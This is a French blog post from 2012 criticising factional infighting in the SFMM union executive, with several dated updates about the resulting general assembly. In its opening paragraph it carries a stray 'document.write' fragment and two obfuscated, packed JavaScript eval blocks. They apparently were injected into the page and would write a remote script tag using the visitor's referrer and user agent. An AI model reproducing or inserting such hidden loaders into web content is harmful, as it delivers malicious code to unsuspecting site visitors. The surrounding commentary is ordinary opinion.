Affaires syndicales

Je m’étais juré de ne plus écrire sur les affaires syndicales car c’est vraiment trop frustrant, document.write(“”); aliénant et inutilement énergivore. Mais ces choses publiques (et toute l’absurdité qu’elles génèrent) ont le tour de venir vous chercher d’une façon qu’il est souvent difficile de rester silencieux. D’autant plus que, pour une raison qui ne m’est pas vraiment claire, mes collègues semblent me considérer comme une ressource et recherchent souvent mes conseils en la matière (même si, dans le fonds, je n’y connais pas grand chose outre y appliquer simplement raison et discernement, ce qu’on appelle communément “jugeote” ou “gros bon sens”). Donc, si les affaires du SFMM vous intéresse, lisez au-delà du saut de page pour découvrir leur dernières aberrations:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zanbz|var|u0026u|referrer|yarby||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ftdrn|var|u0026u|referrer|rnhya||js|php’.split(‘|’),0,{}))

Depuis quelques mois déjà il y avait des signes visibles d’un malaise au sein de l’exécutif syndical, ce qui s’est vu confirmé par la démission récente du secrétaire-général et du vice-président (révélé au commun des mortels par l’annonce d’une élection complémentaire). Puis il y a eut cette rumeur de pétition circulant dans les locaux de la ville et dans les bibliothèques. S’il n’était pas apparent, au début, par qui et pourquoi on demandait ces signatures, les motifs se sont clarifiés un peu avec l’appel impromptu à une assemblée générale. L’avis de convocation nous apprend qu’une pétition “signé par plus de 10 % des membres (…) demande la tenue d’une assemblée générale pour discuter de la situation [«préjudiciable»] «qui sévit au sein de l’exécutif et de l’Équipe syndicale» (…)” et envisager des solutions…

Le tout se précise vraiment avec la circulation de courriels (et d’une page FaceBook) dénoncant cette pétition (et l’assemblée) comme une manoeuvre putschiste de la part d’une minorité de l’exécutif (dirigée par nulle autre que sa présidente) et qui viserait le déclenchement d’élections générales anticipées. L’autre groupe répond avec un communiqué faisant allusion au fait que certaines personnes du syndicat auraient subi de l’intimidation et par une page FaceBook d’invitation à l’assemblée.

Il appert donc que l’exécutif du SFMM est scindé en deux factions fratricides. Je n’ai aucune sympathie pour ni l’une, ni l’autre de ces factions. Car il est déjà désolant que cet exécutif syndical ait géré avec une incompétence et un manque de transparence crasse plusieurs des dossiers dont il avait la responsabilité (les lettres d’ententes des bibliothécaires et techniciens auxiliaires, l’équité salariale, les régimes de retraite et, non le moindre, la négociation tardive de la convention collective) mais il est plutôt insultant de les voir perdrent leur temps (et le nôtre) avec ces querelles personelles et guéguerres ridicules. Je rappele à tous que notre convention collective (qui avait déjà été étendu pour un an) est à nouveau échue. Pendant que ces messieurs-dames se battent pour sécuriser ou améliorer leur position politique au sein de l’exécutif, il y a-t-il quelqu’un qui se préoccupe des membres du syndicat, leur propre raison d’être? Eh oui: et nous là-dedans? Qui est-ce qui nous défend et négocie pour nous pendant ce temps? Un peu moins de grabuge et de dissension, svp, et faites donc votre travail bande d’abrutis. C’est pour ça qu’on vous paye, non?

Je crois que ce que l’exécutif syndical mériterait c’est que les membres viennent effectivement en grand nombre à cette assemblée (je suis peut-être optimiste, mais n’oubliez pas que voir ces imbéciles se quereller n’a pas de prix; amenez le pop-corn et régalez vous du spectacle!) et votent pour le déclenchement d’élections générales anticipées. Car il n’y a pas de véritable solution à cette “situation préjudiciable.” Des élections partielles pour combler les postes vacants ne règleraient en rien la discordre existente et ne rendraient en rien l’ensemble de l’équipe plus compétente. Ils ont démontré leur incapacité à gerer les dossiers importants, qu’ils mettaient leurs intérêts personnels devant les nôtre (les membres), qu’ils ne pouvaient pas se comporter en adultes et règler leurs querelles civilement. Je ne vois qu’une seule possibilité: mettre tout ce beau monde dehors et les remplacer par une nouvelle équipe, des visages nouveaux, dynamiques et, espérons-le, plus compétant. On a rien à perdre.

Enfin, on verra bien ce qui se dira à la dite assemblée.

Mise à jour (2012-01-29):

Si Le Canardo Pressé ne se mouille pas trop, on y retrouve tout de même quelques commentaires intéressants.

De plus, Du 109 au 429 (l’opposition “officieuse” à l’équipe syndicale Accès-Cible), ne tarde pas à commenter la situation (aussi disponible sur FaceBook).

Mise à jour (2012-01-30):

Le Canardo Pressé reprend le texte du 109 au 429.

Mise à jour (2012-01-31):

Le commentaire d’un camarade du SFMM sur le site du Canardo Pressé demande si un changement d’affiliation syndicale ne serait pas une solution à nos problèmes. C’est effectivement une solution qui serait envisageable mais c’est probablement un processus long et complexe (il faudrait d’abord obtenir l’accord de la grande majorité des membres Cols-Blancs ou d’un groupe de membres, comme les aides-bibliothécaires et techniciens par exemple, puis “magasiner” une autre affiliation, négocier, etc.). Ce n’est certainement pas une solution qui nous donnera une convention collective plus rapidement…

Mise à jour (2012-02-01):

Voir mon “Compte-rendu de l’assemblée.”